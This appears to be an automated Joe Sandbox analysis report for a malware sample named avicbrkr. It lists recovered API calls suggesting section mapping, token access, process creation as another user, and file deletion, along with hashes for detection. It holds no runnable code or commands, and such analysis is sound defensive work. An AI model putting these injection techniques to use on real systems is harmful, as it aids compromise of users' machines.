                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • FindFirstFileW.KERNEL32(?,00000000), ref: 0038751B
                      • RemoveDirectoryW.KERNEL32(?), ref: 00387595
                      • DeleteFileW.KERNEL32(?), ref: 003875A0
                      • FindNextFileW.KERNEL32(?,00000000), ref: 003875B3
                      • GetLastError.KERNEL32 ref: 003875CE
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: File$FindHeap$AllocateDeleteDirectoryErrorFirstFreeLastNextRemove
                      • String ID:
                      • API String ID: 1296863077-0
                      • Opcode ID: d720247ff6f37343dad57e7a8a4cccaa4ae3530149b463008913aae05dcbef8a
                      • Instruction ID: 0851a8512447ebbfb2844a0536a0605c19c46ae1c2f688866d20945d32c0511e
                      • Opcode Fuzzy Hash: d720247ff6f37343dad57e7a8a4cccaa4ae3530149b463008913aae05dcbef8a
                      • Instruction Fuzzy Hash: 81414E7280430AEBCF13AFA4CC49AAEBF7AFF05740F2084A5E505A61A1DB75CA54DB50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,0039D2D8,00000001), ref: 0037C1C5
                      • CreateThread.KERNEL32(00000000,00000000,0037BE82,00000000,00000000,0000005C), ref: 0037C1DF
                      • GetLastError.KERNEL32(?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0037C1F0
                      • CloseHandle.KERNEL32(00000000), ref: 0037C1F9
                      • GetLastError.KERNEL32(?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0037C201
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CreateErrorLast$CloseHandleNamedPipeThread
                      • String ID:
                      • API String ID: 2018970776-0
                      • Opcode ID: eedd26a3333fc8b74ebb5168b38ffccfc9f5f5836eec7cabd3d57f7f50822659
                      • Instruction ID: 626ae0edcc6236c227bf881b473406887fcf862ea45c1f5bb5a5ad31df0bd474
                      • Opcode Fuzzy Hash: eedd26a3333fc8b74ebb5168b38ffccfc9f5f5836eec7cabd3d57f7f50822659
                      • Instruction Fuzzy Hash: F3F0F671210140BBD733576AEC0DEAB7B6CDBC6B60F244526FE1AD22E0E6758D41C6B0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 00389807: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,0038F8D5,00000008,00000000,00000000,?,?,0038FB66,?,?,00000001,00000000,00000000), ref: 00389810
                        • Part of subcall function 00389807: mbstowcs.NTDLL ref: 00389837
                        • Part of subcall function 00389807: memset.NTDLL ref: 00389849
                      • GetVersion.KERNEL32(00000008,00000000,00000000,?,?,0038FB66,?,?,00000001,00000000,00000000,?,00000008,00000030), ref: 0038F8E1
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      • GetLastError.KERNEL32(00000008,00000000,00000000,?,?,0038FB66,?,?,00000001,00000000,00000000,?,00000008,00000030), ref: 0038FA12
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorFreeHeapLastVersionlstrlenmbstowcsmemset
                      • String ID: GET$POST
                      • API String ID: 1057714926-3192705859
                      • Opcode ID: 555ede2a1dc8ddb285a8de33cdd424ac0cfdde28fc797eb8a0e256a19fd429ca
                      • Instruction ID: 0e1b979b00c125bda4bb9a3f03abc47294ce62ddb22e72fd2b9cda492c5fbf68
                      • Opcode Fuzzy Hash: 555ede2a1dc8ddb285a8de33cdd424ac0cfdde28fc797eb8a0e256a19fd429ca
                      • Instruction Fuzzy Hash: 5441CE71500308BFDB32BF65DC48EAB7BB9EB84740F124929F646DA091E771D984DBA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • FindFirstFileW.KERNEL32(?,?,?,0039F9E0), ref: 003916E1
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • FindClose.KERNEL32(00000002), ref: 00391779
                        • Part of subcall function 003915BE: lstrlenW.KERNEL32(00000000,00000000,003970EC,003970C0,?,?,?,00391753,?,00000000,?), ref: 003915CE
                        • Part of subcall function 003915BE: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,00391753,?,00000000,?), ref: 003915F0
                        • Part of subcall function 003915BE: lstrcpyW.KERNEL32(00000000,00000000), ref: 0039161C
                        • Part of subcall function 003915BE: lstrcatW.KERNEL32(00000000,0039FA5C), ref: 00391628
                      • FindNextFileW.KERNEL32(?,00000010), ref: 0039176B
                      • FreeLibrary.KERNEL32(?), ref: 0039178B
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                        • Part of subcall function 003911F6: lstrlenW.KERNEL32(?,00000000,?,?,?,003916D0,?,0039F9E0), ref: 00391203
                        • Part of subcall function 003911F6: GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,003916D0,?,0039F9E0), ref: 0039122C
                        • Part of subcall function 003911F6: LoadLibraryW.KERNEL32(-0000FFFE), ref: 0039126F
                        • Part of subcall function 003911F6: FreeLibrary.KERNEL32(00000000,?,?,?,003916D0,?,0039F9E0), ref: 00391301
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: FindFreeLibrary$FileHeaplstrlen$AllocateByteCharCloseCurrentDirectoryFirstLoadMultiNextWidelstrcatlstrcpy
                      • String ID:
                      • API String ID: 1924547645-0
                      • Opcode ID: cbe645e6b8ad818fed74e19c82c8006049c2a83bbc7e16882d52655418dff3f7
                      • Instruction ID: 760ce08c4ab57a11c598a196f305ad4e742ae728b4f2543a3bd4efa57cae9be2
                      • Opcode Fuzzy Hash: cbe645e6b8ad818fed74e19c82c8006049c2a83bbc7e16882d52655418dff3f7
                      • Instruction Fuzzy Hash: 07314E725183029FDB22AF60DC85A2FBBE9FF84B54F054D2EF494A2150D731D9198B92
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • NtOpenProcess.NTDLL(0063618C,00000400,?,00637614), ref: 00632AC3
                      • NtOpenProcessToken.NTDLL(0063618C,00000008,0000000C), ref: 00632AD6
                      • NtClose.NTDLL(0063618C), ref: 00632B36
                        • Part of subcall function 0063115F: RtlAllocateHeap.NTDLL(00000000,?,00633BA9), ref: 0063116B
                        • Part of subcall function 00631174: HeapFree.KERNEL32(00000000,?,00633C0E), ref: 00631180
                      • NtClose.NTDLL(0000000C), ref: 00632B2D
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: CloseHeapOpenProcess$AllocateFreeToken
                      • String ID:
                      • API String ID: 3496914122-0
                      • Opcode ID: 8b0abf584ecf3a86951cd62dce1698482e4d8841cad59d0c3beefcf1c78b1b32
                      • Instruction ID: 830bde782f3235fc6c205efbfa7bf44c6d3de7ef4423f44e831972028b352170
                      • Opcode Fuzzy Hash: 8b0abf584ecf3a86951cd62dce1698482e4d8841cad59d0c3beefcf1c78b1b32
                      • Instruction Fuzzy Hash: A42139B2A0021DBBDB019F94CC45EDEBFBEEF09744F104066F605E6121D7B19A449BE0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 00632776
                      • memset.NTDLL ref: 0063279B
                      • RtlNtStatusToDosError.NTDLL(00000000), ref: 006327B7
                      • NtClose.NTDLL(?), ref: 006327CB
                        • Part of subcall function 006326DC: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 00632709
                        • Part of subcall function 006326DC: RtlNtStatusToDosError.NTDLL(00000000), ref: 00632710
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorSectionStatus$CloseCreateViewmemset
                      • String ID:
                      • API String ID: 783833395-0
                      • Opcode ID: bd2dd21a209d5a6d12ff2f05fc24269b38462613aa0511ccc204924372d58649
                      • Instruction ID: 98e598f1a44b269ae6337031264216ad9b00f483ba31e97c2a6a39db1da6347a
                      • Opcode Fuzzy Hash: bd2dd21a209d5a6d12ff2f05fc24269b38462613aa0511ccc204924372d58649
                      • Instruction Fuzzy Hash: BC213C7190022AAFCB01DFA8CC849EEBBBAFF08B10F104516F911E7250D7709A558BE5
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 0038DF23
                      • memset.NTDLL ref: 0038DF48
                      • RtlNtStatusToDosError.NTDLL(00000000), ref: 0038DF64
                      • NtClose.NTDLL(?), ref: 0038DF78
                        • Part of subcall function 0038DE89: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0038DEB6
                        • Part of subcall function 0038DE89: RtlNtStatusToDosError.NTDLL(00000000), ref: 0038DEBD
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorSectionStatus$CloseCreateViewmemset
                      • String ID:
                      • API String ID: 783833395-0
                      • Opcode ID: a8740612b1c819dc1deed297107c5f634bf8224183f97fcf137cc1245095dbaa
                      • Instruction ID: e8683d35570b39abd23e32e66fac91f298940f2a8bbc8b9e1664beb76a58a913
                      • Opcode Fuzzy Hash: a8740612b1c819dc1deed297107c5f634bf8224183f97fcf137cc1245095dbaa
                      • Instruction Fuzzy Hash: 37211A71910329AFCB02EFA8DC449EEBBB9FF48750F100956FA11F7290D7719A549BA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • memset.NTDLL ref: 00390D78
                      • LocalFree.KERNEL32(00000000), ref: 00390EF3
                        • Part of subcall function 00390CAF: memcpy.NTDLL(00000000,?,?,?,0039C008,EW9,00390EE7,?,?), ref: 00390CD3
                        • Part of subcall function 00390CEA: lstrlenW.KERNEL32(?,003970C0,0039C008,00390F37,00399508), ref: 00390CF0
                        • Part of subcall function 00390CEA: memcpy.NTDLL(00000000,?,00000002,00000002), ref: 00390D0C
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: FreeHeapmemcpy$AllocateLocallstrlenmemset
                      • String ID: EW9
                      • API String ID: 2594422205-602920354
                      • Opcode ID: eea3d34592d04e434068c10a6b759cbefed89bd62ea4a20716b6ba7a635dde4f
                      • Instruction ID: ba0b746401bb1436030d19f52f9f80e44fc4eb8a214e23262b1ed6f668a5b924
                      • Opcode Fuzzy Hash: eea3d34592d04e434068c10a6b759cbefed89bd62ea4a20716b6ba7a635dde4f
                      • Instruction Fuzzy Hash: 44A1F372C00209EFDF27ABE4CC45AAEBBBAFF05314F154425E551A6160D7329E95EF10
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • NtUnmapViewOfSection.NTDLL(000001F4), ref: 0037DF9E
                      • RtlNtStatusToDosError.NTDLL(00000000), ref: 0037DFA5
                      • HeapFree.KERNEL32(00000000,00000000,000001F4), ref: 0037DFB4
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorFreeHeapSectionStatusUnmapView
                      • String ID:
                      • API String ID: 269469588-0
                      • Opcode ID: 54a7755d743d692d242f69757fb88251358a6d940999c2bc08d7869816359375
                      • Instruction ID: 86fdb597584757505e285df379ac2975af1eea91419974156fd01b282933cb6c
                      • Opcode Fuzzy Hash: 54a7755d743d692d242f69757fb88251358a6d940999c2bc08d7869816359375
                      • Instruction Fuzzy Hash: 3EE06D32515611ABD7336B54EC09F867B78AF86B11F024402F905961A0D766D8408B90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memset
                      • String ID: $4V8$nj8
                      • API String ID: 2221118986-3563554493
                      • Opcode ID: 88149e77351085c37225b25cf501c2addae4bbe3fa4c09dcc594855ca3ca4b04
                      • Instruction ID: 4ca7aae98050ef7c6b5a136533de3547f59878d513e7f254575e2db89ba9089c
                      • Opcode Fuzzy Hash: 88149e77351085c37225b25cf501c2addae4bbe3fa4c09dcc594855ca3ca4b04
                      • Instruction Fuzzy Hash: FC42C030A00B058FCB26DF69C4907BAFBF1FF59304F6489AEC49697A51D774A986CB40
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 00631174: HeapFree.KERNEL32(00000000,?,00633C0E), ref: 00631180
                        • Part of subcall function 0063115F: RtlAllocateHeap.NTDLL(00000000,?,00633BA9), ref: 0063116B
                      • NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 00633C4C
                      • RtlNtStatusToDosError.NTDLL(C000009A), ref: 00633C85
                        • Part of subcall function 006314BA: RtlUpcaseUnicodeString.NTDLL(?,0063764C,00000001), ref: 006314E6
                        • Part of subcall function 006314BA: RtlFreeAnsiString.NTDLL(?), ref: 00631564
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: FreeHeapString$AllocateAnsiErrorInformationQueryStatusSystemUnicodeUpcase
                      • String ID:
                      • API String ID: 1666562127-0
                      • Opcode ID: da30157ac90579e47a2ba9850654b6f46a1fe2ec5d4c371231e2a64941030769
                      • Instruction ID: 2b47b4f22142bb255c3ae1978fed5beb81d53d84fd506de818a8ad5e7ccadaab
                      • Opcode Fuzzy Hash: da30157ac90579e47a2ba9850654b6f46a1fe2ec5d4c371231e2a64941030769
                      • Instruction Fuzzy Hash: F001F432902530BBDB225B69CD04AEFBA6B9F42B54F166118FE01BB311D7758F0192E4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 0038943C
                      • RtlNtStatusToDosError.NTDLL(C000009A), ref: 00389477
                        • Part of subcall function 00376DBD: RtlUpcaseUnicodeString.NTDLL(?,?,00000001), ref: 00376DF0
                        • Part of subcall function 00376DBD: RtlFreeAnsiString.NTDLL(?), ref: 00376E68
                        • Part of subcall function 00376DBD: WaitForSingleObject.KERNEL32(00000000), ref: 00376E76
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: FreeHeapString$AllocateAnsiErrorInformationObjectQuerySingleStatusSystemUnicodeUpcaseWait
                      • String ID:
                      • API String ID: 3048131082-0
                      • Opcode ID: cd73680be32b2de0fac42b7f1e5fc86e0cdd88259ceabd7e1798a2515a814347
                      • Instruction ID: 3ea479848fce3b9f2f78c6d236503a354069f70474199cda295b7c9f9ac55c78
                      • Opcode Fuzzy Hash: cd73680be32b2de0fac42b7f1e5fc86e0cdd88259ceabd7e1798a2515a814347
                      • Instruction Fuzzy Hash: 6EF0D632912324AADB33BBA68C05BBFA65D9F45B40F1A4096FD05A71059B648D0293D1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • memset.NTDLL ref: 00633B46
                      • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 00633B5E
                        • Part of subcall function 00633CB2: RtlNtStatusToDosError.NTDLL(C0000002), ref: 00633CDF
                        • Part of subcall function 00633CB2: SetLastError.KERNEL32(00000000,?,006322DE,00000000,0063244E,0063244E,00000004,?,00000000,00000000,0063605C,00000000), ref: 00633CE6
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: Error$InformationLastProcessQueryStatusmemset
                      • String ID:
                      • API String ID: 3332669973-0
                      • Opcode ID: 670c5224fcbf3723f5763eb0bf94b5b46cd9e7e0d9e338fe9d6d995767cb8417
                      • Instruction ID: 0a855bf61859a6ab577302506d6e3244d04b61ab15ba80ed2535e985b67d9c5d
                      • Opcode Fuzzy Hash: 670c5224fcbf3723f5763eb0bf94b5b46cd9e7e0d9e338fe9d6d995767cb8417
                      • Instruction Fuzzy Hash: 78F0FFB690026CBADB50DA95CC05FDEBB6DEB14750F0080A5BA18E6191D770DB548BE4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • memset.NTDLL ref: 003890CE
                      • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 003890E6
                        • Part of subcall function 003894A2: RtlNtStatusToDosError.NTDLL(C0000002), ref: 003894CF
                        • Part of subcall function 003894A2: SetLastError.KERNEL32(00000000,?,0038D667,00000000,?,00010007,00000004,?), ref: 003894D6
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Error$InformationLastProcessQueryStatusmemset
                      • String ID:
                      • API String ID: 3332669973-0
                      • Opcode ID: f47bece7368d256ae0f1693b46028bdcf515a2595e20dc8fd707eb4ea806ea2f
                      • Instruction ID: fe6f4c68d33dd896c0a005e24341e1caf100c8edf55f1adf9c9643df2257d0e3
                      • Opcode Fuzzy Hash: f47bece7368d256ae0f1693b46028bdcf515a2595e20dc8fd707eb4ea806ea2f
                      • Instruction Fuzzy Hash: 94F012B690421CBADF11EB91DC4AFEE7BBCAB04740F0440A1BA08E6191D775DB558BA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 00632709
                      • RtlNtStatusToDosError.NTDLL(00000000), ref: 00632710
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorSectionStatusView
                      • String ID:
                      • API String ID: 1313840181-0
                      • Opcode ID: 0d3b88d318b96eb52eb80e0aa28e49aab707580c293b8d4465127781c8a77452
                      • Instruction ID: 30d040184bfc72da973d216fa0d2c47fb08cb1b590a876c40962161d96ef10c6
                      • Opcode Fuzzy Hash: 0d3b88d318b96eb52eb80e0aa28e49aab707580c293b8d4465127781c8a77452
                      • Instruction Fuzzy Hash: 5BE0EDB6900208FFEF059F94DC0FDEF7B7DEB44300F00856AB611A6151E6B0AA18DB60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0038DEB6
                      • RtlNtStatusToDosError.NTDLL(00000000), ref: 0038DEBD
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorSectionStatusView
                      • String ID:
                      • API String ID: 1313840181-0
                      • Opcode ID: 8ebb16a4518e123f8201894ebd9e74adacd3d1a3ae09da63fe7bfbe9d69be68a
                      • Instruction ID: 248bc805961f52183cdf9a4c8c89e3787071faa495f4292b2f399591fd359f6b
                      • Opcode Fuzzy Hash: 8ebb16a4518e123f8201894ebd9e74adacd3d1a3ae09da63fe7bfbe9d69be68a
                      • Instruction Fuzzy Hash: 8CE0E5B6910208FFDF059F94DC0FDEF7B7DEB44300F00856AF611A5150E6B1AA149B60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseEnterLeaveSleepmemset$CreateErrorHandleLastQueryThreadValuelstrcpymbstowcsmemcpy
                      • String ID: pnls$~FvR9
                      • API String ID: 2687114040-181916723
                      • Opcode ID: 8a74b06f106d832cee82d42d7173499b585ba9bfcdf0a5cbe8f0975bca680af3
                      • Instruction ID: 16a4f0b9b08e68690b7631b1e4fdbd3ecdd9be3e9064741c766f377609cfaed7
                      • Opcode Fuzzy Hash: 8a74b06f106d832cee82d42d7173499b585ba9bfcdf0a5cbe8f0975bca680af3
                      • Instruction Fuzzy Hash: 7CD1A471B10316ABD733FBB49DC5B6B32ECAF08740B158866B849DB245DB39ED018760
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • memset.NTDLL ref: 003847EC
                        • Part of subcall function 00384118: memset.NTDLL ref: 00384129
                        • Part of subcall function 00384118: memset.NTDLL ref: 00384135
                        • Part of subcall function 00384118: memset.NTDLL ref: 00384160
                      • memset.NTDLL ref: 003847DD
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memset
                      • String ID:
                      • API String ID: 2221118986-0
                      • Opcode ID: 6ee4bd29241c6ee520bba4337aa6bc1c5712ce623825292290905d75af18a4ec
                      • Instruction ID: 9500212206ab24ec9139e8f32d51f2c6e40833e8c34e67fc7709bef19cb95d01
                      • Opcode Fuzzy Hash: 6ee4bd29241c6ee520bba4337aa6bc1c5712ce623825292290905d75af18a4ec
                      • Instruction Fuzzy Hash: 82021070511B628FCB7ADB29C680566BBF0BF657107604E6ED6E786E90E731F881CB04
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memset
                      • String ID:
                      • API String ID: 2221118986-0
                      • Opcode ID: 819c2c46a69b3733ff17a680ca6cc4523ee8a4f298073f0afd7945a7a8fe9f23
                      • Instruction ID: 67b8e342ec28e91bc378f6923eae74de31d882dd1dd3ddc8c7adf33b19db5822
                      • Opcode Fuzzy Hash: 819c2c46a69b3733ff17a680ca6cc4523ee8a4f298073f0afd7945a7a8fe9f23
                      • Instruction Fuzzy Hash: 7622847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • memcpy.NTDLL(?,00000000,00000000,000000FE,?,?,00000000), ref: 0037EB0B
                        • Part of subcall function 0037E690: memcpy.NTDLL(00000000,?,00000000,8B25EB0D,?,?,0037F764,?,?,?,00000000), ref: 0037E6E8
                        • Part of subcall function 0037E690: memcpy.NTDLL(?,?,?,8B25EB0D,?,?,0037F764,?,?,?,00000000), ref: 0037E713
                        • Part of subcall function 0037E690: memcpy.NTDLL(00000000,?,?,?,?,00000000), ref: 0037E72C
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memcpy
                      • String ID:
                      • API String ID: 3510742995-0
                      • Opcode ID: f1278b8e6998a4460bcfd0ca306df998882e10f6b0e1f395827835e093d38ea5
                      • Instruction ID: 3d9e9c90598ef83c749195aae842b6837453e4bdddfcd38d6de2c5ad2f3f70ed
                      • Opcode Fuzzy Hash: f1278b8e6998a4460bcfd0ca306df998882e10f6b0e1f395827835e093d38ea5
                      • Instruction Fuzzy Hash: AD328E70A00705DFDB36CF68C48066ABBF2FF48300F2585ADD89A9B691D778EA45CB50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID:
                      • String ID: @
                      • API String ID: 0-2766056989
                      • Opcode ID: c25733d85fa9b37bd23ae5a828271c17e6a894d62e2010f31db5039f771a3815
                      • Instruction ID: 028eec895313e994184be99ae38ba429de6bfe4f6e73e65825d86d85ccf5c0e5
                      • Opcode Fuzzy Hash: c25733d85fa9b37bd23ae5a828271c17e6a894d62e2010f31db5039f771a3815
                      • Instruction Fuzzy Hash: FAE19F71900219CFCF2ACF68C5906FEB7B1FF85304F25816EE856A7294D7389A55CB90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • CreateProcessAsUserA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?), ref: 0038DA10
                        • Part of subcall function 0038D89A: ResumeThread.KERNEL32(00000004,?,0038D936,?), ref: 0038D8AF
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CreateProcessResumeThreadUser
                      • String ID:
                      • API String ID: 3393100766-0
                      • Opcode ID: d40978ea55082924f2cf8b0e0a53191357e96491aa01faee1506a53139f586fc
                      • Instruction ID: 54b6f513c6fc480753b603d2350ddf38af57985869b052bf749a6ea0697cf947
                      • Opcode Fuzzy Hash: d40978ea55082924f2cf8b0e0a53191357e96491aa01faee1506a53139f586fc
                      • Instruction Fuzzy Hash: 2AF0E732215209AFDF025F99DC41CDA7FAAFF4D378B050225FA5992160C772D821AB90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memcpy
                      • String ID:
                      • API String ID: 3510742995-0
                      • Opcode ID: 0eb81ac035f2f102480b272c2545c53a1a5f78b961ea166555c520ed7547918e
                      • Instruction ID: 0b9759ac4f13ab5180573767f0727734cae5b00e5161ba9740f586923c037df8
                      • Opcode Fuzzy Hash: 0eb81ac035f2f102480b272c2545c53a1a5f78b961ea166555c520ed7547918e
                      • Instruction Fuzzy Hash: 33516C71210B00AFD7328F6AC985A6BB7E5FF49320B149A2DE94ED7A10D778F841CB54
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • HeapFree.KERNEL32(00000000,003971C8,0038AD19), ref: 0038AB66
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: FreeHeap
                      • String ID:
                      • API String ID: 3298025750-0
                      • Opcode ID: 35438fcc07f22b4af2a5b96708bf4ce167b09e5199481dee9ee1a5750d7f593d
